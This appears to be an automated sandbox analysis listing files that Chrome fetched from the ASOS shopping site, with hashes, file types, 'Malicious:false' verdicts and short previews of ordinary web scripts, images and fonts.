                                                                                                                                                                                                                                                                  Preview:'use strict';var k=function(a){function b(c){return a.next(c)}function e(c){return a.throw(c)}return new Promise(function(c,d){function f(h){h.done?c(h.value):Promise.resolve(h.value).then(b,e).then(f,d)}f(a.next())})};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;var u,v;a:{for(var x=["CLOSURE_FLAGS"],B=m,C=0;C<x.length;C++)if(B=B[x[C]],B==null){v=null;break a}v=B}var G=v&&v[610401301];u=G!=null?G:!1;var H;const I=m.navigator;H=I?I.userAgentData||null:null;function J(a){return u?H?H.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function K(a){var b;a:{const e=m.navigator;if(e){const c=e.userAgent;if(c){b=c;break a}}b=""}return b.indexOf(a)!=-1};function L(){return u?!!H&&H.brands.length>0:!1}function O(){return L()?J("Chromium"):(K("Chrome")||K("CriOS"))&&!(L()?0:K("Edge"))||K("Silk")};!K("Android")||O();O();!K("Safari")||O()||(L()?0:K("Coast"))||(L()?0:K("Opera"))||(L()?0:K("Edge"))||(L()?J("Microsoft Edge"):K("Edg/"))||L()&
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):5730
                                                                                                                                                                                                                                                                  Entropy (8bit):4.244128236209575
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:a/1+YH9jGit5S+ZofBU42YZWGs0W9pp3GqUTCN0gMMVqUTCN0gMMeqUTCN0gMMQ:a9l9zEcLUTCyMoUTCyM1UTCyMQ
                                                                                                                                                                                                                                                                  MD5:FEFAD1DDF3C888F66E430221294FA111
                                                                                                                                                                                                                                                                  SHA1:500266193855751FBE2581E48EE570A0AEEFEB8D
                                                                                                                                                                                                                                                                  SHA-256:9475967B4ED1A722227C1316D6F17795F4363C839A42B4336557528DF89664FE
                                                                                                                                                                                                                                                                  SHA-512:3645AD63A9770EA9622C361DEB12F3F9ADBD4F5C44879DDFD02CFC06468FBC93D42A432BC0CDFC6DC1367C0FAEEE37EEBCB1A253458AB7FE750F9F1EE9046971
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:window.__versionManifest = {. useCurrentKeyStoreDataversion: true,. keyStoreDataversion: {. current: 'mhabj1f-41',. previous: '11a1qu9-40'. },. features: {. 'web-event-icon': {},. 'login-interstitial-page': true. },. siteChromeVersion: {. au: {. useCurrent: true,. current: '13',. previous: '12'. },. ru: {. useCurrent: true,. current: '13',. previous: '12'. },. com: {. useCurrent: true,. current: '13',. previous: '12'. },. es: {. useCurrent: true,. current: '13',. previous: '12'. },. it: {. useCurrent: true,. current: '13',. previous: '12'. },. de: {. useCurrent: true,. current: '13',. previous: '12'. },. fr: {. useCurrent: true,. current: '13',. previous: '12'. },. us: {. useCurrent: true,. current: '13',. previous: '12'. },. row: {. useCurrent: true,. current: '13',. previous: '12'.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):5485
                                                                                                                                                                                                                                                                  Entropy (8bit):7.331531240557233
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:+OjA9N26MT0D5MdtbZPAVwzV2QvkUaiXBh1S8/2kdMcDR:+OksYNMtKwYQvHd6k6uR
                                                                                                                                                                                                                                                                  MD5:CCE47E1CA1DF7B1E50E84490634C9C43
                                                                                                                                                                                                                                                                  SHA1:450DADF1B1F7B6BC5AD27447EB74DE59716F3E01
                                                                                                                                                                                                                                                                  SHA-256:9015D2D9293931B46E1809860B5B97996EA1236EBEE3498C4BEB01D7FCB27F80
                                                                                                                                                                                                                                                                  SHA-512:A14EE5913E1B39DCD13185E05970D8730489030CDD5DB3FFEEBD25831B571F252D41B5AF0F8406C5BA135087B272BE9F359C1804ACBEE4AD01826C264855DB9B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://images.asos-media.com/navigation/american-express-png
                                                                                                                                                                                                                                                                  Preview:... ftypavif....avifmif1miafMA1A....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......`...<....pixi............av1C. .....Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (26334)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):26384
                                                                                                                                                                                                                                                                  Entropy (8bit):5.362940079689228
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:7CgTkWPMgNmomFNpKw612MtT19eYBTyu9Cjrm:rpkBrF/KjV5TpSK
                                                                                                                                                                                                                                                                  MD5:3667B64516B460AE907CE815618207AB
                                                                                                                                                                                                                                                                  SHA1:88A4E8491DBCF88BF76486534CAD0BD99192C614
                                                                                                                                                                                                                                                                  SHA-256:2BDC31421C9AD184399B387B910AF5B7110732E2B3B532FD1EEA1E3ED4CFCF38
                                                                                                                                                                                                                                                                  SHA-512:456AB64A42760E802405A4BE84215A4C832DFB07ED7EF973B88804479FEBA7815FD23A0BA2398DFC49BCA957A4618FD6BFE462F1A2E2B3CFEED884CB24B85B33
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:this.window=this.window||{},this.window.asos=this.window.asos||{},this.window.asos.webRequest=function(e){"use strict";var t=function(e,t,r){return t in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e};var r=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n};var n=function(e){if(Array.isArray(e))return r(e)};var o=function(e){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(e))return Array.from(e)};var i=function(e,t){if(e){if("string"==typeof e)return r(e,t);var n=Object.prototype.toString.call(e).slice(8,-1);return"Object"===n&&e.constructor&&(n=e.constructor.name),"Map"===n||"Set"===n?Array.from(e):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?r(e,t):void 0}};var a=function(){throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")};var s=function(e){return n(e)
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):5380
                                                                                                                                                                                                                                                                  Entropy (8bit):7.898971063751532
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yEm3WCi/NZ/16fX7EIX9RboJF2mI7CHVspagBFpXjtkr7tA5hz0Z:y7tml16fIn0N7AeaMjtOg0Z
                                                                                                                                                                                                                                                                  MD5:17BBE1D5A582E95F6535CD303BE75A58
                                                                                                                                                                                                                                                                  SHA1:B5E2588569EE2AD83D79E08F54A5D66B8C5FE494
                                                                                                                                                                                                                                                                  SHA-256:173965F7FD3E16B537BE8F01BFCD3C3C571798B948ED30DC087CEF602FFCB511
                                                                                                                                                                                                                                                                  SHA-512:0997BBD811C67E4AB4E4603710FA609A2181DDFF6925C7D99FDA5E4845EFE448BAA329C426CC87AE8A6CD847624516B1E64E3879C60F92F55616DE1CE1E63BBF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA7xha3gxL0LyuWF8xqJSoCy9aQ-CZnuJeBttoz9_4u-0dr2ooWnm-XyId997e5APa7ifIuB7pzFl0Ld1JHgMi727Mh_bXvh33TfwJ0QP4-jBMaOIGMY9nVllrV0ucFNLw_YWa5NAg0HBGl7nBIePGFmWIlko0bVYW4FzRKb_r8YRN5GuA3Fdmj1g-URC-WVZUOlHiPBV-qRB8c5HFucXS6ADUe7iw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=e16caff0ee415144
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....S.[.K*..E}...p:q..1...$0.6[l.H23.w.......,.Q.Z....23..Wlq`c..h#$.^..y..p..nC.T...8-...:..+..;]...8.._o....WG.\.H.g.Y7>......@.r1.6.-.J"L.L`.....@.9S.d...zU../.1.R....RU[*F..?...,h.+."...o...A......6....2oW.._..r.......\."[......#/.>a..N...Hb..eh.....m.;.0..b1...$.=..A+..tb..H,....a.ds.#8Z"C..]..II#P...>_......7`.....#?.....+*..@%....[..U@..>H.I'...'x...'..$/
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3810
                                                                                                                                                                                                                                                                  Entropy (8bit):7.943543789912295
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:OIQMcJ3Snkq1Zx9/1YFKaFA1TapnwrSInCf51SG/:zQdikqPx9aHA1TapnwHnQr5
                                                                                                                                                                                                                                                                  MD5:B4A4AEEF41EE413911BDF53724431511
                                                                                                                                                                                                                                                                  SHA1:F84E97D881DD1D90C191103EA1715D5A646D319F
                                                                                                                                                                                                                                                                  SHA-256:3B672FA58CC2E0A0A21C7AEE6E5D8B9A3CB8BA2C7692BEFB7E69EC29F24B895F
                                                                                                                                                                                                                                                                  SHA-512:AE1BF7ABC4D1FC615191C2BEEAA63E3CD8DD100666D3BAE99CDA7F6F19AC473B2997C772D2BE0924707030A6269E6EE43284D47F9B2BE3986F99E8F3C3FA765B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB.........IDATx..].tT.......2!;.......U+..bm......ZA..B.[.."...R.....R==...'.S[.EK8.e5..I.@....:....af2.Kf.v.?gr.w..........P...nO<.0~.Ec..".c.Z......2..U..b....I..*.vM~.$.#.Qs.F..vD.....,...4.L.....jll....e.......O..###OGGG....=d4..2.-.+(.U)i.kh......Emm.\Y.c.t..J.~...Fh$2.....k...!.rm.]...............]...hB$Ij....6k.[t.w..Fs..)...#pTV.......+.m...}.P;**....D\Sh...tj..L.t.....k6].|....E~7.t'..m!..@R.t>.-..|$.=..F..%d5.&YN..r.xt.%$$....T9.t..ug/&W}....jjjh.........2..7..a;...6o.....=@..g.|y. O...c...4l....+9...,.)..x....A.........Tj..E..."7(...T.^.BP..,./%m..ck%...Hk..5.4bi6...Qnf.........?;..*O..:.;l".....%..+^$t.n....JO.t.R.N..L..fd...}....f..J.t(..b!O.^.....+t....,]...8!3..+?%[.2Q..u.L...jtc2.g].3...... .'pT.p2U|A6.t.....Z..{4.Z.t..`.&`.t..1k.P[y.w.............^...]`.H....;!....i....kH.s3....M6...I3.`.6`.DMTG ..s...S.4....9.1*.B"...................ML..9....90....... /p.>.... ........l|Wta.{..t.M..?.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (44400)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):103871
                                                                                                                                                                                                                                                                  Entropy (8bit):5.301796105512762
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:vg38JO73XTC03R6oiW2qdEnVy2Z0ckAef6h42eQMMmzV8vdw/j7wMZWQDHtIG:XM3XvoqCVj0ckAef+4BX7jIQDyG
                                                                                                                                                                                                                                                                  MD5:10D497EBAED7684B01350C94B2173F36
                                                                                                                                                                                                                                                                  SHA1:AE63FFA53C6C3B36C97D7AF280037AE9738A43EE
                                                                                                                                                                                                                                                                  SHA-256:4602879D326AFCA6F961464C1DC2C8199F9EF10A0E1C59546424FCBB64242296
                                                                                                                                                                                                                                                                  SHA-512:2DF1C5DA79370040A3C3EBBB90B2713C4309469384F1E1583A7A8A8593AA291977697C0F4E9CE97B5B7CAB0075F3FC5B63F6CC9170EC56445A7CD8AFD9CD96DC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.asosglobal.com/receiver_browse.html
                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html lang="en">..<head>. <meta charset="utf-8">. <meta http-equiv="Content-Security-Policy" content="default-src https:; connect-src https:; font-src 'none'; object-src 'none'; script-src https: 'unsafe-inline' 'unsafe-eval'; style-src https: 'unsafe-inline'; form-action https:; img-src https:">. <title>Asos Web Secure Script Container</title>. <script>. var config = {. appId: "188510375",. accountId: "711799",. licenseKey: Math.random() >= 0.98 ? "3edea625b0" : "". };.. if (config.licenseKey) {. window.NREUM || (window.NREUM = {}); NREUM.init = { privacy: { cookies_enabled: true } };. NREUM.loader_config = { accountID: config.accountId, trustKey: config.accountId, agentID: config.appId, licenseKey: config.licenseKey, applicationID: config.appId };. NREUM.info = { beacon:"bam.nr-data.net", errorBeacon:"bam.nr-data.net", licenseKey: config.licenseKey, applicationID: config.appId, sa: 1 };.. ;(()=>{"use strict";var e,t,r={6
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (51253), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):347351
                                                                                                                                                                                                                                                                  Entropy (8bit):5.574173383761741
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:ZJ5cO8Tejh3sHVZCeptbC43DvCITK83gYQos3kd:58CaC43D4os3kd
                                                                                                                                                                                                                                                                  MD5:E155C85E8DB604CECD8E16B9D10BD18D
                                                                                                                                                                                                                                                                  SHA1:0B4FAB5DE6E0CE5E4008DDC117126A560B4BEA2E
                                                                                                                                                                                                                                                                  SHA-256:235DEFD3B56267A94592495B2AC810E31E744FDCB1ED893C7C70BF7F3B19B51F
                                                                                                                                                                                                                                                                  SHA-512:AE0DAC71C0ECAE63BB9A9EBC66C94206A3D3C73D053C69E5FA2C3F5FA2487DD905B62390E2EBC6BD42132082B196718846221962905258137938E98E7AEF61F5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>. 13.0.0-6ca9c0c7-69--><html lang="en-GB" data-platform="desktop" data-store-code="COM" data-country-code="GB" data-gender="null">. <head><script>!function(i,n){let o=window[i]=window[i]||{};o=o[n]=o[n]||{},o._cookieData={initialLength:document.cookie.length,initialCount:document.cookie.split(";").length}}("asos","siteChrome");.//# sourceMappingURL=https://assets.asosservices.com/sitechromepublisher/cookieScript.2d2fd467.inlined.js.map</script><meta charSet="utf-8"/><title>ASOS | Online Shopping for the Latest Clothes & Fashion</title><meta name="description" content="Discover the latest fashion trends with ASOS. Shop the new collection of clothing, footwear, accessories, beauty products and more. Order today from ASOS."/><meta name="p:domain_verify" content="7d543da16a86f7ad75c452097bfa9e47"/><meta name="msvalidate.01" content="0BC251BA275FCFB5D0505FEBC89F03B6"/><meta property="fb:app_id" content="123073601043263"/><meta name="viewport" content="width=devi
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1436), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1436
                                                                                                                                                                                                                                                                  Entropy (8bit):5.772642010255766
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:2jkm94/zKPccAjZy+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtfO1/6QsLc:VKEcixKo7LmvtUjPKtX7ZO1/2LrwUnG
                                                                                                                                                                                                                                                                  MD5:6AC1AAC0E4A97806847BEBE09B43BFD8
                                                                                                                                                                                                                                                                  SHA1:448435E86E1C1106738999B419EB42E31A6C2033
                                                                                                                                                                                                                                                                  SHA-256:256A34EF09CBD3706D44C9225BAF1C1C129F9012499554D3E7812D21117F25A3
                                                                                                                                                                                                                                                                  SHA-512:1BDDA0622053FD0A92CDFDB94D4B36C7BE94A7E38B58EA549EBFC5797AA67909A2B6BE6817A65BF13C9326B306B3F179E453ABF84CDD62375C7BACAFF3CFD9F2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('explicit');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (50450)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):50959
                                                                                                                                                                                                                                                                  Entropy (8bit):5.357310062408202
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:7m58qk43Xg4dsB62gZR9ZjaDHZ0cyBxdhifxItD:7mJB3XrsBs9560cyBxdcfxItD
                                                                                                                                                                                                                                                                  MD5:76F55EE255012A4A449F15A401D952A3
                                                                                                                                                                                                                                                                  SHA1:B02E1D4D68EA9210C715C118F00BFAF22C269CCB
                                                                                                                                                                                                                                                                  SHA-256:037B8F92A29A18ABEB0DCE30FC8CA5B6DC8BF4220383AF63E013C29F8464339C
                                                                                                                                                                                                                                                                  SHA-512:3C5CD16543419070AFC29D0998CA0639BDD5517761F148EF6DF981FC131E22333D70FCD5C2269EDE6BBC047BC9C237B1938603AE31FA2DF8DB9E4218E7EF17E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://creativeassets.asosservices.com/js/cx-nrelic.js
                                                                                                                                                                                                                                                                  Preview:(function() {. window.cx = window.cx || {};. window.cx.configNewRelic = window.cx.configNewRelic || function(appIdStr) {. ;window.NREUM||(NREUM={});NREUM.init={privacy:{cookies_enabled:true}};.. ;NREUM.loader_config={accountID:"711799",trustKey:"711799",agentID: appIdStr,licenseKey:"3edea625b0",applicationID: appIdStr};. ;NREUM.info={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",licenseKey:"3edea625b0",applicationID: appIdStr,sa:1};.. (()=>{"use strict";var e,t,r={5763:(e,t,r)=>{r.d(t,{P_:()=>l,Mt:()=>g,C5:()=>s,DL:()=>v,OP:()=>T,lF:()=>D,Yu:()=>y,Dg:()=>h,CX:()=>c,GE:()=>b,sU:()=>_});var n=r(8632),i=r(9567);const o={beacon:n.ce.beacon,errorBeacon:n.ce.errorBeacon,licenseKey:void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},a={};function s(e){if(!e)throw new Error("All info obj
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):15552
                                                                                                                                                                                                                                                                  Entropy (8bit):7.983966851275127
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                                                                                                                                                                  MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                                                                                                                                  SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                                                                                                                                  SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                                                                                                                                  SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                                                                                                  Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):42156
                                                                                                                                                                                                                                                                  Entropy (8bit):7.959523447340413
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:aEBAzyXwmO1wR34+x7eFsJlvdxnAKQfrnh/ipkxf7RoYLplOJDyTX+D:a6XOw5Z7/7dxnShSKoRJDI8
                                                                                                                                                                                                                                                                  MD5:00B393C32DDE96A34D26E19DAB26441D
                                                                                                                                                                                                                                                                  SHA1:A8B09C6BE5D0EDBC731ED9D06DF2D645184DC88B
                                                                                                                                                                                                                                                                  SHA-256:ECE3E8B6F7425915ED406AE6E912105EB2A438AA6C8DA32179D831C17DD62817
                                                                                                                                                                                                                                                                  SHA-512:9C8F0AE74C5809DB28317A18EDB6FEC04E9963BC53253DE66432949A047E42BBA434FB8C15B3875AAF404E1B05220FCD58D15DD5D0AD1AD9B00AF3A2C59AC6BB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA7MXNoyJ98S8vYaKLVqOcyY96RFM577XE7fN75VpW1iO88SKR5BFLUDXQYN6ZT6AAmlO5WeZkMpc217Wa4fJBZT26_qOGNLjCXPfphKnud4CrzjckIdyCYWEqv14VONcvyKT8Ae4OUaDk2THegyHWo61miM2k-HD_c9WTjFQEYHMJcaBeKaAzWmtGr9qkrxck0w5AXU0-5jarhqehysIrtBXSiUYQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................,.,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....`iZ.n.bbU.$.......9.=..$..x....9.C....t.....Qr....nv......H9..g...`w..).r.YIa...S.............g......}....E....o4.O.q......F....Q.S.,n........+.b..6P...r#.#.!.2I. .X....s..DutuF_).........9..1......b...HT..{.P<..(ls..,.s.......F.,.$9`..x.9.. e.....1h....=@m.=W8...9....cD.'...).6)....,y$t..........zy..^Ek.mQ......(.....`19..N.4FD..2.z......1....>....
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):227898
                                                                                                                                                                                                                                                                  Entropy (8bit):5.38498285820349
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:tOfnGOo43+EG6hF8bfQc8NJAyxDscqhZGkzyxtznqnYUv+dIbLEOKv:TOo43U4c8QT2pnqbv+dIbLEOW
                                                                                                                                                                                                                                                                  MD5:483833CB6162C627DE1845CB475A73B9
                                                                                                                                                                                                                                                                  SHA1:82C3FA2F439105AFABC5C4967FD063DCBADAAC1C
                                                                                                                                                                                                                                                                  SHA-256:641D06A33C26BCB862EFB7273FBDD98BD37927E73AA59D77CD18712053A1622D
                                                                                                                                                                                                                                                                  SHA-512:5BEF95F37E606385E331806E20C0409EC877336EF9298B8D86236AE5A367A72E14994F96E0CB616ED376513EF8936769B177C4D8E8D729348B54D70689057830
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/sitechromepublisher/client.sitechrome.b41df99c18eb4328a7b6.js
